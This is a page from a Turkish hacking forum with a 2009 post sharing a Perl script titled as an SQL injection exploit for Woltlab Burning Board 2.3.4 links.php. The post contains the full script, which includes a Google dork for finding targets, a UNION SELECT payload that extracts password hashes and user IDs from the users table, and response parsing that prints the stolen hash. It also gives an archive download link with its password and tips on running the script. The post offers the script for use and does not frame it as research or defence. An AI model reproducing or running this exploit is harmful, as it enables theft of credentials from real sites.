CryptoSuite.Org

Geri git   CryptoSuite.ORG || The Best Encryption Platform Of The World > Hack & Security > Web Hacking & Security > Exploitler & Açıklar ( Exploits & Bugs )
Sayfaya güncelle Woltlab Burning Board 2.3.4 (links.php) SQL Injection Exploit
Kayıt ol Yardım Ajanda Forumları Okundu Kabul Et

Konu Bilgileri
Konu Başlığı
Woltlab Burning Board 2.3.4 (links.php) SQL Injection Exploit
Konudaki Cevap Sayısı
0
Şuan Bu Konuyu Görüntüleyenler
 
Görüntülenme Sayısı
421

Yeni Konu aç Cevapla
 
LinkBack Seçenekler Stil
Alt 08-25-09, 19:02   #1 (permalink)
Member Banned
 

User ID : 1515
Messages : 23
Threads : 23
Thanks : 3
Rat : Turkojan
dj_leon isimli Üye şimdilik offline konumundadır
CryptoSuite.Org
Standart Woltlab Burning Board 2.3.4 (links.php) SQL Injection Exploit
PHP- Kodu:
#!/usr/bin/perluse IO::Socket;print q{################################################ ################################## #### Woltlab Burning Board 2.3.4 <= "links.php" SQL Injection Exploit #### - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #### Exploit by | LoK-Crew #### Bug by | x82 #### Googledork | inurl:/wbb2/links.php?cat #### Usage | links.pl [server] [path] #### - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - #### ################################################## ################################};$webpage = $ARGV[0];$directory = $ARGV[1];if (!$webpage||!$directory) { die "[+] Exploit failed\n"; }$wbb_dir = "http://".$webpage.$directory."links.php?cat=31337+union+s elect+password,userid+from+bb1_users";$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[+] Can't connect to Server\n";print "[+] Exploiting....\n";print $sock "GET $wbb_dir HTTP/1.1\n";print $sock "Accept: */*\n";print $sock "User-Agent: Hacker\n";print $sock "Host: $webpage\n";print $sock "Connection: close\n\n";while ($answer = <$sock>) { if ($answer =~ /(................................)<\/span><\/b><\/font>/) { print "[+] Hash: $1\n"; exit(); } if ($answer =~ /SQL-DATABASE ERROR/) { break; }}$wbb_dir = "http://".$webpage.$directory."links.php?cat=31337+union+s elect+password,userid+from+bb1_users";close($sock) ;$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[+] Can't connect to Server\n";print $sock "GET $wbb_dir HTTP/1.1\n";print $sock "Accept: */*\n";print $sock "User-Agent: Hacker\n";print $sock "Host: $webpage\n";print $sock "Connection: close\n\n";while ($answer = <$sock>) { if ($answer =~ /(................................)<\/span><\/b><\/font>/) { print "[+] Hash: $1\n"; exit(); } if ($answer =~ /SQL-DATABASE ERROR/) { print "[+] Try replacing bb1_users with bb2_users\n"; break; }}close($sock);print "[+] Exploit failed\n"; 
Download Rar : Dosya Upload - DosyaLoad.Net

Rar Pasword : cs

Active-Perl kullanarak bilindik Exploit kullanma teknikleri ile SQL Exploit'i kullanabilirsiniz..
  Alıntı ile Cevapla
Cevapla

Bookmarks

« vBulletin v3.5.3 Ddos Exploit (Resimli Anlatım) | PHP-Nuke 7.9 Final (phpbb_root_path) Remote File Inclusions »

Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 
Seçenekler
Stil
Normal Normal

Yetkileriniz
Konu Acma Yetkiniz Yok
Cevap Yazma Yetkiniz Yok
Eklenti Yükleme Yetkiniz Yok
Mesajınızı Değiştirme Yetkiniz Yok
BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodu Kapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık

Benzer Konular
Konu Konuyu Başlatan Forum Cevaplar Son Mesaj
MyBulletin Board LiveForKiLL Hazır Scriptler 28 06-15-09 11:21
NC GBook 1.0 Remote Command injection Exploit manyakhacker Exploitler & Açıklar ( Exploits & Bugs ) 0 05-30-09 15:00
Ashampoo Burning Studio 9.03 Beta/ Burning Studio 7.32 NaTre Programlar 1 05-27-09 19:27
Powered by PHP Links CoWBoY Exploitler & Açıklar ( Exploits & Bugs ) 0 05-18-09 03:54
Google Links Extractor CoWBoY Web Hacking & Security 0 04-30-09 23:54


WEZ Format +3. Şuan Saat: 18:22.

Bize Ulaşın - Arşiv - Yukarı git

5651 Sayılı Kanun’un 8. maddesine ve T.C.K’nın 125. maddesine göre TÜM ÜYELERİMİZ yaptıkları paylaşımlardan sorumludur.
Sitemiz, hukuka, yasalara, telif haklarına ve kişilik haklarına saygılı olmayı amaç edinmiştir. Sitemiz, 5651 sayılı yasada tanımlanan “yer sağlayıcı” olarak hizmet vermektedir. İlgili yasaya göre, site yönetiminin hukuka aykırı içerikleri kontrol etme yükümlülüğü YOKTUR!Bu sebeple, sitemiz “uyar ve kaldır” prensibini benimsemiştir. Telif hakkına konu olan eserlerin yasal olmayan bir biçimde paylaşıldığını ve yasal haklarının çiğnendiğini düşünen hak sahipleri veya meslek birlikleri, BURADAN bize ulaşabilirler. Buraya ulaşan talep ve şikayetler Hukuk Müşavirimiz tarafından incelenecek, şikayet yerinde görüldüğü takdirde ihlal olduğu düşünülen içerikler sitemizden kaldırılacaktır.Ayrıca, mahkemelerden talep gelmesi halinde hukuka aykırı içerik üreten ve hukuka aykırı paylaşımda bulunan üyelerin tespiti için gerekli teknik veriler sağlanacaktır.Sitemiz üzerinden yapılan satış ilanları sadece firmalar için olup, kötüye kullanımından doğacak hasarlardan kesinlikle sitemiz sorumlu tutulamaz.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135